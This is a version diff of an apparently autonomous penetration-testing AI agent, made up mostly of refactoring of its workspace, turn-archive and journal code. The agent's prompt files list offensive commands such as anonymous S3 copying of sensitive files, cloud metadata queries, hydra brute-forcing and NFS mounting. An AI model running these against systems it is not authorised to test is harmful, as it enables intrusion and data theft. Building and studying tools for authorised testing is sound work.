pentesting 0.49.4 → 0.50.0

package/dist/cloud/prompt.md

@@ -16,7 +16,7 @@ curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMeta
 
 # S3 Bucket Enumeration
 aws s3 ls s3://<bucket> --no-sign-request
-aws s3 cp s3://<bucket>/sensitive.txt .pentesting/tmp/ --no-sign-request
+aws s3 cp s3://<bucket>/sensitive.txt .pentesting/workspace/ --no-sign-request
 
 # Azure Storage
 curl -s "https://<account>.blob.core.windows.net/<container>?restype=container&comp=list"

package/dist/file-sharing/prompt.md

@@ -38,8 +38,8 @@ hydra -L users.txt -P passwords.txt <target> ftp
 showmount -e <target>
 nmap -p 2049 --script nfs-ls,nfs-showmount,nfs-statfs <target>
 # NFS Mount
-mkdir -p .pentesting/tmp/nfs && mount -t nfs <target>:/<export> .pentesting/tmp/nfs
-ls -la .pentesting/tmp/nfs/
+mkdir -p .pentesting/workspace/nfs && mount -t nfs <target>:/<export> .pentesting/workspace/nfs
+ls -la .pentesting/workspace/nfs/
 
 # WebDAV
 davtest -url http://<target>/webdav/

package/dist/main.js

@@ -187,7 +187,19 @@ var MEMORY_LIMITS = {
   /** Number of leading words to match for duplicate command detection */
   COMMAND_MATCH_WORDS: 3,
   /** Maximum unverified techniques to show in prompt */
-  PROMPT_UNVERIFIED_TECHNIQUES: 10
+  PROMPT_UNVERIFIED_TECHNIQUES: 10,
+  /**
+   * Maximum turn entries and turn records kept on disk.
+   * WHY: journal.ts had this as a module-local constant (50).
+   * Centralizing enables consistent rotation across journal JSON + turn MD files.
+   */
+  MAX_TURN_ENTRIES: 50,
+  /**
+   * Maximum raw output files kept in .pentesting/outputs/.
+   * WHY: journal.ts had this as a module-local constant (30).
+   * Output files are large raw dumps; the journal entries retain their summaries.
+   */
+  MAX_OUTPUT_FILES: 30
 };
 
 // src/shared/constants/patterns.ts
@@ -331,7 +343,7 @@ var ORPHAN_PROCESS_NAMES = [
 
 // src/shared/constants/agent.ts
 var APP_NAME = "Pentest AI";
-var APP_VERSION = "0.49.4";
+var APP_VERSION = "0.50.0";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var LLM_ROLES = {
   SYSTEM: "system",
@@ -828,6 +840,12 @@ function ensureDirExists(dirPath) {
     mkdirSync(dirPath, { recursive: true });
   }
 }
+function fileTimestamp() {
+  return (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-").slice(0, 19);
+}
+function sanitizeFilename(name, maxLength = 30) {
+  return name.replace(/[^a-zA-Z0-9_-]/g, "_").slice(0, maxLength);
+}
 
 // src/shared/constants/time.ts
 var MS_PER_MINUTE = 6e4;
@@ -837,7 +855,7 @@ var SECONDS_PER_HOUR = 3600;
 // src/shared/constants/paths.ts
 import path from "path";
 var PENTESTING_ROOT = ".pentesting";
-var WORK_DIR = `${PENTESTING_ROOT}/tmp`;
+var WORK_DIR = `${PENTESTING_ROOT}/workspace`;
 var MEMORY_DIR = `${PENTESTING_ROOT}/memory`;
 var REPORTS_DIR = `${PENTESTING_ROOT}/reports`;
 var SESSIONS_DIR = `${PENTESTING_ROOT}/sessions`;
@@ -845,13 +863,14 @@ var LOOT_DIR = `${PENTESTING_ROOT}/loot`;
 var OUTPUTS_DIR = `${PENTESTING_ROOT}/outputs`;
 var DEBUG_DIR = `${PENTESTING_ROOT}/debug`;
 var JOURNAL_DIR = `${PENTESTING_ROOT}/journal`;
-var TURNS_DIR = `${PENTESTING_ROOT}/memory/turns`;
+var ARCHIVE_DIR = `${PENTESTING_ROOT}/archive`;
+var TURN_FOLDER_PREFIX = "turn-";
 var WORKSPACE = {
   /** Root directory */
   get ROOT() {
     return path.resolve(PENTESTING_ROOT);
   },
-  /** Temporary files */
+  /** Working directory (scripts, redirects, staging) */
   get TMP() {
     return path.resolve(WORK_DIR);
   },
@@ -871,7 +890,7 @@ var WORKSPACE = {
   get LOOT() {
     return path.resolve(LOOT_DIR);
   },
-  /** Full tool outputs */
+  /** DEPRECATED — tool outputs now in archive/turn-N/tools/ (kept for clearWorkspace cleanup) */
   get OUTPUTS() {
     return path.resolve(OUTPUTS_DIR);
   },
@@ -879,13 +898,26 @@ var WORKSPACE = {
   get DEBUG() {
     return path.resolve(DEBUG_DIR);
   },
-  /** Persistent per-turn journal (§13 memo system) */
+  /** DEPRECATED — journal/ no longer written to (kept for /clear cleanup) */
   get JOURNAL() {
     return path.resolve(JOURNAL_DIR);
   },
-  /** Turn record files */
+  /** Turn archive root: .pentesting/archive/ */
   get TURNS() {
-    return path.resolve(TURNS_DIR);
+    return path.resolve(ARCHIVE_DIR);
+  },
+  /**
+   * Resolve a specific turn directory: .pentesting/archive/turn-{N}/
+   * Each turn is a named folder containing record.md, structured.json, analyst.md, summary.md, tools/
+   */
+  turnPath(turn) {
+    return path.resolve(ARCHIVE_DIR, `${TURN_FOLDER_PREFIX}${turn}`);
+  },
+  /**
+   * Resolve the tools output directory for a specific turn: .pentesting/archive/turn-{N}/tools/
+   */
+  turnToolsPath(turn) {
+    return path.resolve(ARCHIVE_DIR, `${TURN_FOLDER_PREFIX}${turn}`, "tools");
   }
 };
 
@@ -1129,6 +1161,66 @@ var BLOCKED_BINARIES = /* @__PURE__ */ new Set([
 // src/shared/utils/debug-logger.ts
 import { appendFileSync, writeFileSync } from "fs";
 import { join } from "path";
+
+// src/shared/constants/files.ts
+var FILE_EXTENSIONS = {
+  // Data formats
+  JSON: ".json",
+  MARKDOWN: ".md",
+  TXT: ".txt",
+  XML: ".xml",
+  // Network capture
+  PCAP: ".pcap",
+  HOSTS: ".hosts",
+  MITM: ".mitm",
+  // Process I/O
+  STDOUT: ".stdout",
+  STDERR: ".stderr",
+  STDIN: ".stdin",
+  // Scripts
+  SH: ".sh",
+  PY: ".py",
+  CJS: ".cjs",
+  // Config
+  ENV: ".env",
+  BAK: ".bak"
+};
+var SPECIAL_FILES = {
+  /** Latest state snapshot */
+  LATEST_STATE: "latest.json",
+  /** README */
+  README: "README.md",
+  /** Session summary (single source — LLM primary, deterministic fallback) */
+  SUMMARY: "summary.md",
+  /** Persistent knowledge store */
+  PERSISTENT_KNOWLEDGE: "persistent-knowledge.json",
+  /** Debug log file */
+  DEBUG_LOG: "debug.log"
+};
+var TURN_FILES = {
+  /** Turn record (Markdown) — what happened this turn */
+  RECORD: "record.md",
+  /** Structured turn data (JSON) */
+  STRUCTURED: "structured.json",
+  /** Analyst LLM analysis output */
+  ANALYST: "analyst.md",
+  /** Session summary as of this turn (immutable once written) */
+  SUMMARY: "summary.md",
+  /** Directory for raw tool outputs */
+  TOOLS_DIR: "tools"
+};
+var FILE_PATTERNS = {
+  /** Tool output filename: nmap.txt, gobuster.txt (sanitized) */
+  toolOutput(toolName) {
+    return `${sanitizeFilename(toolName)}.txt`;
+  },
+  /** Generate session snapshot filename: 2026-02-21T08-30-15.json */
+  session() {
+    return `${fileTimestamp()}.json`;
+  }
+};
+
+// src/shared/utils/debug-logger.ts
 var DebugLogger = class _DebugLogger {
   static instance;
   logPath;
@@ -1137,7 +1229,7 @@ var DebugLogger = class _DebugLogger {
     const debugDir = WORKSPACE.DEBUG;
     try {
       ensureDirExists(debugDir);
-      this.logPath = join(debugDir, "debug.log");
+      this.logPath = join(debugDir, SPECIAL_FILES.DEBUG_LOG);
       if (clearOnInit) {
         this.clear();
       }
@@ -1842,34 +1934,6 @@ function createTempFile(suffix = "") {
   return join2(tmpdir(), generateTempFilename(suffix));
 }
 
-// src/shared/constants/files.ts
-var FILE_EXTENSIONS = {
-  // Data formats
-  JSON: ".json",
-  MARKDOWN: ".md",
-  TXT: ".txt",
-  XML: ".xml",
-  // Network capture
-  PCAP: ".pcap",
-  HOSTS: ".hosts",
-  MITM: ".mitm",
-  // Process I/O
-  STDOUT: ".stdout",
-  STDERR: ".stderr",
-  STDIN: ".stdin",
-  // Scripts
-  SH: ".sh",
-  PY: ".py",
-  CJS: ".cjs",
-  // Config
-  ENV: ".env",
-  BAK: ".bak"
-};
-var SPECIAL_FILES = {
-  LATEST_STATE: "latest.json",
-  README: "README.md"
-};
-
 // src/engine/process-cleanup.ts
 import { unlinkSync } from "fs";
 
@@ -3091,7 +3155,7 @@ var AttackGraph = class {
 };
 
 // src/shared/utils/agent-memory.ts
-import { existsSync as existsSync4, readFileSync as readFileSync3, writeFileSync as writeFileSync4, mkdirSync as mkdirSync2 } from "fs";
+import { existsSync as existsSync4, readFileSync as readFileSync3, writeFileSync as writeFileSync4 } from "fs";
 import { join as join3 } from "path";
 var WorkingMemory = class {
   entries = [];
@@ -3247,7 +3311,7 @@ var EpisodicMemory = class {
     this.events = [];
   }
 };
-var MEMORY_FILE = join3(WORKSPACE.MEMORY, "persistent-knowledge.json");
+var MEMORY_FILE = join3(WORKSPACE.MEMORY, SPECIAL_FILES.PERSISTENT_KNOWLEDGE);
 var PersistentMemory = class {
   knowledge;
   constructor() {
@@ -3338,7 +3402,7 @@ var PersistentMemory = class {
   }
   save() {
     try {
-      mkdirSync2(WORKSPACE.MEMORY, { recursive: true });
+      ensureDirExists(WORKSPACE.MEMORY);
       writeFileSync4(MEMORY_FILE, JSON.stringify(this.knowledge, null, 2));
     } catch {
     }
@@ -9751,8 +9815,7 @@ function saveState(state) {
     missionSummary: state.getMissionSummary(),
     missionChecklist: state.getMissionChecklist()
   };
-  const sessionId = (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-");
-  const sessionFile = join8(sessionsDir, `${sessionId}.json`);
+  const sessionFile = join8(sessionsDir, FILE_PATTERNS.session());
   writeFileSync6(sessionFile, JSON.stringify(snapshot, null, 2), "utf-8");
   const latestFile = join8(sessionsDir, "latest.json");
   writeFileSync6(latestFile, JSON.stringify(snapshot, null, 2), "utf-8");
@@ -9941,11 +10004,72 @@ function appendBlockedCommandHints(lines, errorLower) {
 }
 
 // src/shared/utils/context-digest.ts
-import { writeFileSync as writeFileSync7, mkdirSync as mkdirSync3, existsSync as existsSync7 } from "fs";
+import { writeFileSync as writeFileSync7 } from "fs";
+
+// src/shared/constants/document-schema.ts
+var MEMO_SECTIONS = {
+  KEY_FINDINGS: "Key Findings",
+  CREDENTIALS: "Credentials/Secrets",
+  ATTACK_VECTORS: "Attack Vectors",
+  FAILURES: "Failures/Errors",
+  SUSPICIONS: "Suspicious Signals",
+  ATTACK_VALUE: "Attack Value",
+  NEXT_STEPS: "Next Steps",
+  REFLECTION: "Reflection"
+};
+var MEMO_PARSE_KEYS = {
+  KEY_FINDINGS: MEMO_SECTIONS.KEY_FINDINGS.toLowerCase(),
+  CREDENTIALS: MEMO_SECTIONS.CREDENTIALS.toLowerCase(),
+  ATTACK_VECTORS: MEMO_SECTIONS.ATTACK_VECTORS.toLowerCase(),
+  FAILURES: MEMO_SECTIONS.FAILURES.toLowerCase(),
+  SUSPICIONS: MEMO_SECTIONS.SUSPICIONS.toLowerCase(),
+  ATTACK_VALUE: MEMO_SECTIONS.ATTACK_VALUE.toLowerCase(),
+  NEXT_STEPS: MEMO_SECTIONS.NEXT_STEPS.toLowerCase(),
+  REFLECTION: MEMO_SECTIONS.REFLECTION.toLowerCase()
+};
+var TURN_SECTIONS = {
+  TOOLS_EXECUTED: "\uC2E4\uD589 \uB3C4\uAD6C",
+  KEY_INSIGHTS: "\uD575\uC2EC \uC778\uC0AC\uC774\uD2B8",
+  SELF_REFLECTION: "\uC790\uAE30\uBC18\uC131"
+};
+var INSIGHT_TAGS = {
+  DISCOVERED: "DISCOVERED",
+  CREDENTIAL: "CREDENTIAL",
+  CONFIRMED: "CONFIRMED",
+  DEAD_END: "DEAD END",
+  SUSPICIOUS: "SUSPICIOUS",
+  NEXT: "NEXT"
+};
+var TURN_EMPTY_MESSAGES = {
+  NO_TOOLS: "(\uB3C4\uAD6C \uC2E4\uD589 \uC5C6\uC74C)",
+  NO_INSIGHTS: "(\uD2B9\uC774\uC0AC\uD56D \uC5C6\uC74C)",
+  NO_REFLECTION: "(\uBC18\uC131 \uC5C6\uC74C)"
+};
+var SUMMARY_SECTIONS = {
+  TITLE: "Session Journal Summary",
+  TECHNIQUES_TRIED: "Techniques Tried (by attack value)",
+  TECHNIQUES_LEGEND: "> \u26A1HIGH=keep drilling \u26A1MED=worth exploring \u26A1LOW=low priority \u26A1NONE=abandon",
+  ANALYST_ANALYSIS: "\u{1F9E0} Analyst Analysis (attack value rationale)",
+  SUSPICIOUS: "\u{1F50D} Suspicious Signals (unconfirmed, needs investigation)",
+  KEY_FINDINGS: "\u{1F4CB} Key Findings",
+  CREDENTIALS: "\u{1F511} Credentials Obtained",
+  SUCCESS_VECTORS: "\u2705 Successful Attack Vectors",
+  FAILURE_CAUSES: "\u274C Failure Causes (do not repeat)",
+  NEXT_RECS: "\u27A1\uFE0F Next Recommendations"
+};
+var STATUS_ICONS = {
+  SUCCESS: "\u2705",
+  FAILURE: "\u274C"
+};
+
+// src/shared/utils/context-digest.ts
 var PASSTHROUGH_THRESHOLD = 500;
 var PREPROCESS_THRESHOLD = 3e3;
 var MAX_PREPROCESSED_LINES = 800;
-var getOutputDir = () => WORKSPACE.OUTPUTS;
+var _currentTurn = null;
+function setCurrentTurn(turn) {
+  _currentTurn = turn;
+}
 var MAX_DUPLICATE_DISPLAY = 3;
 var ANALYST_MAX_INPUT_CHARS = 8e4;
 var FALLBACK_MAX_CHARS = 3e4;
@@ -10154,13 +10278,13 @@ function parseAnalystMemo(response) {
   const rawValue = attackValueLine.toUpperCase();
   const attackValue = ["HIGH", "MED", "LOW", "NONE"].includes(rawValue) ? rawValue : "LOW";
   return {
-    keyFindings: filterNone(sections["key findings"] || []),
-    credentials: filterNone(sections["credentials/secrets"] || []),
-    attackVectors: filterNone(sections["attack vectors"] || []),
-    failures: filterNone(sections["failures/errors"] || []),
-    suspicions: filterNone(sections["suspicious signals"] || []),
+    keyFindings: filterNone(sections[MEMO_PARSE_KEYS.KEY_FINDINGS] || []),
+    credentials: filterNone(sections[MEMO_PARSE_KEYS.CREDENTIALS] || []),
+    attackVectors: filterNone(sections[MEMO_PARSE_KEYS.ATTACK_VECTORS] || []),
+    failures: filterNone(sections[MEMO_PARSE_KEYS.FAILURES] || []),
+    suspicions: filterNone(sections[MEMO_PARSE_KEYS.SUSPICIONS] || []),
     attackValue,
-    nextSteps: filterNone(sections["next steps"] || []),
+    nextSteps: filterNone(sections[MEMO_PARSE_KEYS.NEXT_STEPS] || []),
     reflection: [
       attackValueReasoning ? `[${attackValue}] ${attackValueReasoning}` : "",
       ...reflectionLines
@@ -10205,13 +10329,13 @@ function normalizeLine(line) {
 }
 function saveFullOutput(output, toolName) {
   try {
-    const outputDir = getOutputDir();
-    if (!existsSync7(outputDir)) {
-      mkdirSync3(outputDir, { recursive: true });
+    if (_currentTurn === null) {
+      debugLog("general", "saveFullOutput called without current turn set", { toolName });
+      return "(no current turn \u2014 output not saved)";
     }
-    const timestamp = (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-").slice(0, 19);
-    const safeName = toolName.replace(/[^a-zA-Z0-9_-]/g, "_").slice(0, 30);
-    const filePath = `${outputDir}/${timestamp}_${safeName}.txt`;
+    const toolsDir = WORKSPACE.turnToolsPath(_currentTurn);
+    ensureDirExists(toolsDir);
+    const filePath = `${toolsDir}/${FILE_PATTERNS.toolOutput(toolName)}`;
     writeFileSync7(filePath, output, "utf-8");
     return filePath;
   } catch (err) {
@@ -11182,44 +11306,39 @@ function getAttacksForService(service, port) {
 }
 
 // src/shared/utils/journal.ts
-import { writeFileSync as writeFileSync8, readFileSync as readFileSync5, existsSync as existsSync8, readdirSync as readdirSync2, statSync as statSync2, unlinkSync as unlinkSync5 } from "fs";
+import { writeFileSync as writeFileSync8, readFileSync as readFileSync5, existsSync as existsSync8, readdirSync as readdirSync2, statSync as statSync2, rmSync as rmSync2 } from "fs";
 import { join as join9 } from "path";
-var MAX_JOURNAL_ENTRIES = 50;
-var MAX_OUTPUT_FILES = 30;
-var TURN_PREFIX = "turn-";
-var SUMMARY_FILE = "summary.md";
-function writeJournalEntry(entry) {
-  try {
-    const journalDir = WORKSPACE.JOURNAL;
-    ensureDirExists(journalDir);
-    const padded = String(entry.turn).padStart(4, "0");
-    const filePath = join9(journalDir, `${TURN_PREFIX}${padded}.json`);
-    writeFileSync8(filePath, JSON.stringify(entry, null, 2), "utf-8");
-    return filePath;
-  } catch (err) {
-    debugLog("general", "Failed to write journal entry", { turn: entry.turn, error: String(err) });
-    return null;
-  }
+function parseTurnNumbers(turnsDir) {
+  if (!existsSync8(turnsDir)) return [];
+  return readdirSync2(turnsDir).filter((e) => e.startsWith(TURN_FOLDER_PREFIX) && /^\d+$/.test(e.slice(TURN_FOLDER_PREFIX.length))).map((e) => Number(e.slice(TURN_FOLDER_PREFIX.length)));
 }
 function readJournalSummary() {
   try {
-    const summaryPath = join9(WORKSPACE.JOURNAL, SUMMARY_FILE);
-    if (!existsSync8(summaryPath)) return "";
-    return readFileSync5(summaryPath, "utf-8");
+    const turnsDir = WORKSPACE.TURNS;
+    const turnDirs = parseTurnNumbers(turnsDir).sort((a, b) => b - a);
+    for (const turn of turnDirs) {
+      const summaryPath = join9(WORKSPACE.turnPath(turn), TURN_FILES.SUMMARY);
+      if (existsSync8(summaryPath)) {
+        return readFileSync5(summaryPath, "utf-8");
+      }
+    }
+    return "";
   } catch {
     return "";
   }
 }
-function getRecentEntries(count = MAX_JOURNAL_ENTRIES) {
+function getRecentEntries(count = MEMORY_LIMITS.MAX_TURN_ENTRIES) {
   try {
-    const journalDir = WORKSPACE.JOURNAL;
-    if (!existsSync8(journalDir)) return [];
-    const files = readdirSync2(journalDir).filter((f) => f.startsWith(TURN_PREFIX) && f.endsWith(".json")).sort().slice(-count);
+    const turnsDir = WORKSPACE.TURNS;
+    const turnDirs = parseTurnNumbers(turnsDir).sort((a, b) => a - b).slice(-count);
     const entries = [];
-    for (const file of files) {
+    for (const turn of turnDirs) {
       try {
-        const raw = readFileSync5(join9(journalDir, file), "utf-8");
-        entries.push(JSON.parse(raw));
+        const filePath = join9(WORKSPACE.turnPath(turn), TURN_FILES.STRUCTURED);
+        if (existsSync8(filePath)) {
+          const raw = readFileSync5(filePath, "utf-8");
+          entries.push(JSON.parse(raw));
+        }
       } catch {
       }
     }
@@ -11230,13 +11349,10 @@ function getRecentEntries(count = MAX_JOURNAL_ENTRIES) {
 }
 function getNextTurnNumber() {
   try {
-    const journalDir = WORKSPACE.JOURNAL;
-    if (!existsSync8(journalDir)) return 1;
-    const files = readdirSync2(journalDir).filter((f) => f.startsWith(TURN_PREFIX) && f.endsWith(".json")).sort();
-    if (files.length === 0) return 1;
-    const lastFile = files[files.length - 1];
-    const match = lastFile.match(/turn-(\d+)\.json/);
-    return match ? parseInt(match[1], 10) + 1 : 1;
+    const turnsDir = WORKSPACE.TURNS;
+    const turnDirs = parseTurnNumbers(turnsDir);
+    if (turnDirs.length === 0) return 1;
+    return Math.max(...turnDirs) + 1;
   } catch {
     return 1;
   }
@@ -11245,10 +11361,12 @@ function regenerateJournalSummary() {
   try {
     const entries = getRecentEntries();
     if (entries.length === 0) return;
-    const journalDir = WORKSPACE.JOURNAL;
-    ensureDirExists(journalDir);
+    const latestTurn = entries.reduce((max, e) => Math.max(max, e.turn), 0);
+    if (latestTurn === 0) return;
+    const turnDir = WORKSPACE.turnPath(latestTurn);
+    ensureDirExists(turnDir);
     const summary = buildSummaryFromEntries(entries);
-    const summaryPath = join9(journalDir, SUMMARY_FILE);
+    const summaryPath = join9(turnDir, TURN_FILES.SUMMARY);
     writeFileSync8(summaryPath, summary, "utf-8");
     debugLog("general", "Journal summary regenerated", {
       entries: entries.length,
@@ -11326,7 +11444,7 @@ function formatSummaryMarkdown(buckets, entries) {
   );
   const lastTurn = entries[entries.length - 1]?.turn || 0;
   const sections = [
-    `# Session Journal Summary`,
+    `# ${SUMMARY_SECTIONS.TITLE}`,
     `> Turn ${lastTurn} / ${(/* @__PURE__ */ new Date()).toISOString().slice(0, 19)}`,
     ""
   ];
@@ -11337,81 +11455,38 @@ function formatSummaryMarkdown(buckets, entries) {
     sections.push("");
   };
   if (attemptLines.length > 0) {
-    sections.push("## Techniques Tried (by attack value)");
-    sections.push("> \u26A1HIGH=keep drilling \u26A1MED=worth exploring \u26A1LOW=low priority \u26A1NONE=abandon");
+    sections.push(`## ${SUMMARY_SECTIONS.TECHNIQUES_TRIED}`);
+    sections.push(SUMMARY_SECTIONS.TECHNIQUES_LEGEND);
     sections.push(...attemptLines);
     sections.push("");
   }
-  addSection("\u{1F9E0} Analyst Analysis (attack value rationale)", reflections);
-  addSection("\u{1F50D} Suspicious Signals (unconfirmed, needs investigation)", suspicions);
-  addSection("\u{1F4CB} Key Findings", findings);
-  addSection("\u{1F511} Credentials Obtained", credentials);
-  addSection("\u2705 Successful Attack Vectors", successes);
-  addSection("\u274C Failure Causes (do not repeat)", failures);
-  addSection("\u27A1\uFE0F Next Recommendations", nextSteps);
+  addSection(SUMMARY_SECTIONS.ANALYST_ANALYSIS, reflections);
+  addSection(SUMMARY_SECTIONS.SUSPICIOUS, suspicions);
+  addSection(SUMMARY_SECTIONS.KEY_FINDINGS, findings);
+  addSection(SUMMARY_SECTIONS.CREDENTIALS, credentials);
+  addSection(SUMMARY_SECTIONS.SUCCESS_VECTORS, successes);
+  addSection(SUMMARY_SECTIONS.FAILURE_CAUSES, failures);
+  addSection(SUMMARY_SECTIONS.NEXT_RECS, nextSteps);
   return sections.join("\n");
 }
-function rotateJournalEntries() {
-  try {
-    const journalDir = WORKSPACE.JOURNAL;
-    if (!existsSync8(journalDir)) return;
-    const files = readdirSync2(journalDir).filter((f) => f.startsWith(TURN_PREFIX) && f.endsWith(".json")).sort();
-    if (files.length <= MAX_JOURNAL_ENTRIES) return;
-    const toDelete = files.slice(0, files.length - MAX_JOURNAL_ENTRIES);
-    for (const file of toDelete) {
-      try {
-        unlinkSync5(join9(journalDir, file));
-      } catch {
-      }
-    }
-    debugLog("general", "Journal entries rotated", {
-      deleted: toDelete.length,
-      remaining: MAX_JOURNAL_ENTRIES
-    });
-  } catch {
-  }
-}
-function rotateOutputFiles() {
-  try {
-    const outputDir = WORKSPACE.OUTPUTS;
-    if (!existsSync8(outputDir)) return;
-    const files = readdirSync2(outputDir).filter((f) => f.endsWith(".txt")).map((f) => ({
-      name: f,
-      path: join9(outputDir, f),
-      mtime: statSync2(join9(outputDir, f)).mtimeMs
-    })).sort((a, b) => b.mtime - a.mtime);
-    if (files.length <= MAX_OUTPUT_FILES) return;
-    const toDelete = files.slice(MAX_OUTPUT_FILES);
-    for (const file of toDelete) {
-      try {
-        unlinkSync5(file.path);
-      } catch {
-      }
-    }
-    debugLog("general", "Output files rotated", {
-      deleted: toDelete.length,
-      remaining: MAX_OUTPUT_FILES
-    });
-  } catch {
-  }
-}
 function rotateTurnRecords() {
   try {
     const turnsDir = WORKSPACE.TURNS;
     if (!existsSync8(turnsDir)) return;
-    const files = readdirSync2(turnsDir).filter((f) => f.startsWith(TURN_PREFIX) && f.endsWith(".md")).sort();
-    if (files.length <= MAX_JOURNAL_ENTRIES) return;
-    const toDelete = files.slice(0, files.length - MAX_JOURNAL_ENTRIES);
-    for (const file of toDelete) {
-      try {
-        unlinkSync5(join9(turnsDir, file));
-      } catch {
+    const turnDirs = parseTurnNumbers(turnsDir).map((n) => `${TURN_FOLDER_PREFIX}${n}`).filter((e) => statSync2(join9(turnsDir, e)).isDirectory()).sort((a, b) => Number(a.slice(TURN_FOLDER_PREFIX.length)) - Number(b.slice(TURN_FOLDER_PREFIX.length)));
+    if (turnDirs.length > MEMORY_LIMITS.MAX_TURN_ENTRIES) {
+      const dirsToDel = turnDirs.slice(0, turnDirs.length - MEMORY_LIMITS.MAX_TURN_ENTRIES);
+      for (const dir of dirsToDel) {
+        try {
+          rmSync2(join9(turnsDir, dir), { recursive: true, force: true });
+        } catch {
+        }
       }
+      debugLog("general", "Turn folders rotated", {
+        deleted: dirsToDel.length,
+        remaining: MEMORY_LIMITS.MAX_TURN_ENTRIES
+      });
     }
-    debugLog("general", "Turn records rotated", {
-      deleted: toDelete.length,
-      remaining: MAX_JOURNAL_ENTRIES
-    });
   } catch {
   }
 }
@@ -11726,20 +11801,10 @@ ${lines.join("\n")}
   }
   // --- §13: Session Journal Summary ---
   /**
-   * Load journal summary — prefers Summary Regenerator (⑥) output,
-   * falls back to deterministic journal summary.
+   * Load journal summary from the latest turn folder.
    */
   getJournalFragment() {
     try {
-      const summaryPath = join10(WORKSPACE.TURNS, "summary.md");
-      if (existsSync9(summaryPath)) {
-        const summary2 = readFileSync6(summaryPath, "utf-8");
-        if (summary2.trim()) {
-          return `<session-journal>
-${summary2}
-</session-journal>`;
-        }
-      }
       const summary = readJournalSummary();
       if (!summary) return "";
       return `<session-journal>
@@ -11823,14 +11888,7 @@ var Strategist = class {
       sections.push(failures);
     }
     try {
-      let journalSummary = "";
-      const summaryPath = join11(WORKSPACE.TURNS, "summary.md");
-      if (existsSync10(summaryPath)) {
-        journalSummary = readFileSync7(summaryPath, "utf-8").trim();
-      }
-      if (!journalSummary) {
-        journalSummary = readJournalSummary();
-      }
+      const journalSummary = readJournalSummary();
       if (journalSummary) {
         sections.push("");
         sections.push("## Session Journal (past turns summary)");
@@ -12146,42 +12204,42 @@ function formatTurnRecord(input) {
   const sections = [];
   sections.push(`# Turn ${turn} | ${time} | Phase: ${phase}`);
   sections.push("");
-  sections.push("## \uC2E4\uD589 \uB3C4\uAD6C");
+  sections.push(`## ${TURN_SECTIONS.TOOLS_EXECUTED}`);
   if (tools.length === 0) {
-    sections.push("- (\uB3C4\uAD6C \uC2E4\uD589 \uC5C6\uC74C)");
+    sections.push(`- ${TURN_EMPTY_MESSAGES.NO_TOOLS}`);
   } else {
     for (const tool of tools) {
-      const status = tool.success ? "\u2705" : "\u274C";
+      const status = tool.success ? STATUS_ICONS.SUCCESS : STATUS_ICONS.FAILURE;
       const line = `- ${tool.name}(${tool.inputSummary}) \u2192 ${status} ${tool.analystSummary}`;
       sections.push(line);
     }
   }
   sections.push("");
-  sections.push("## \uD575\uC2EC \uC778\uC0AC\uC774\uD2B8");
+  sections.push(`## ${TURN_SECTIONS.KEY_INSIGHTS}`);
   if (memo6.keyFindings.length > 0) {
-    for (const f of memo6.keyFindings) sections.push(`- DISCOVERED: ${f}`);
+    for (const f of memo6.keyFindings) sections.push(`- ${INSIGHT_TAGS.DISCOVERED}: ${f}`);
   }
   if (memo6.credentials.length > 0) {
-    for (const c of memo6.credentials) sections.push(`- CREDENTIAL: ${c}`);
+    for (const c of memo6.credentials) sections.push(`- ${INSIGHT_TAGS.CREDENTIAL}: ${c}`);
   }
   if (memo6.attackVectors.length > 0) {
-    for (const v of memo6.attackVectors) sections.push(`- CONFIRMED: ${v}`);
+    for (const v of memo6.attackVectors) sections.push(`- ${INSIGHT_TAGS.CONFIRMED}: ${v}`);
   }
   if (memo6.failures.length > 0) {
-    for (const f of memo6.failures) sections.push(`- DEAD END: ${f}`);
+    for (const f of memo6.failures) sections.push(`- ${INSIGHT_TAGS.DEAD_END}: ${f}`);
   }
   if (memo6.suspicions.length > 0) {
-    for (const s of memo6.suspicions) sections.push(`- SUSPICIOUS: ${s}`);
+    for (const s of memo6.suspicions) sections.push(`- ${INSIGHT_TAGS.SUSPICIOUS}: ${s}`);
   }
   if (memo6.nextSteps.length > 0) {
-    for (const n of memo6.nextSteps) sections.push(`- NEXT: ${n}`);
+    for (const n of memo6.nextSteps) sections.push(`- ${INSIGHT_TAGS.NEXT}: ${n}`);
   }
   if (memo6.keyFindings.length === 0 && memo6.failures.length === 0 && memo6.credentials.length === 0) {
-    sections.push("- (\uD2B9\uC774\uC0AC\uD56D \uC5C6\uC74C)");
+    sections.push(`- ${TURN_EMPTY_MESSAGES.NO_INSIGHTS}`);
   }
   sections.push("");
-  sections.push("## \uC790\uAE30\uBC18\uC131");
-  sections.push(reflection || "- (\uBC18\uC131 \uC5C6\uC74C)");
+  sections.push(`## ${TURN_SECTIONS.SELF_REFLECTION}`);
+  sections.push(reflection || `- ${TURN_EMPTY_MESSAGES.NO_REFLECTION}`);
   sections.push("");
   return sections.join("\n");
 }
@@ -12280,6 +12338,7 @@ var MainAgent = class extends CoreAgent {
     if (this.turnCounter === 0) {
       this.turnCounter = getNextTurnNumber();
     }
+    setCurrentTurn(this.turnCounter);
     if (this.userInputQueue.hasPending()) {
       const userMessage = this.userInputQueue.drainAndFormat();
       if (userMessage) {
@@ -12343,12 +12402,11 @@ ${extraction.content.trim()}
           memo: this.turnMemo,
           reflection: this.turnReflections.length > 0 ? this.turnReflections.join(" | ") : this.turnMemo.nextSteps.join("; ")
         };
-        writeJournalEntry(entry);
         try {
-          ensureDirExists(WORKSPACE.TURNS);
-          const ts = (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-").slice(0, 19);
-          const turnFileName = `turn-${String(this.turnCounter).padStart(4, "0")}_${ts}.md`;
-          const turnPath = join12(WORKSPACE.TURNS, turnFileName);
+          const turnDir = WORKSPACE.turnPath(this.turnCounter);
+          const toolsDir = WORKSPACE.turnToolsPath(this.turnCounter);
+          ensureDirExists(turnDir);
+          ensureDirExists(toolsDir);
           const turnContent = formatTurnRecord({
             turn: this.turnCounter,
             timestamp: (/* @__PURE__ */ new Date()).toISOString(),
@@ -12357,12 +12415,31 @@ ${extraction.content.trim()}
             memo: this.turnMemo,
             reflection: entry.reflection
           });
-          writeFileSync9(turnPath, turnContent, "utf-8");
+          writeFileSync9(join12(turnDir, TURN_FILES.RECORD), turnContent, "utf-8");
+          writeFileSync9(join12(turnDir, TURN_FILES.STRUCTURED), JSON.stringify(entry, null, 2), "utf-8");
+          const memoLines = [];
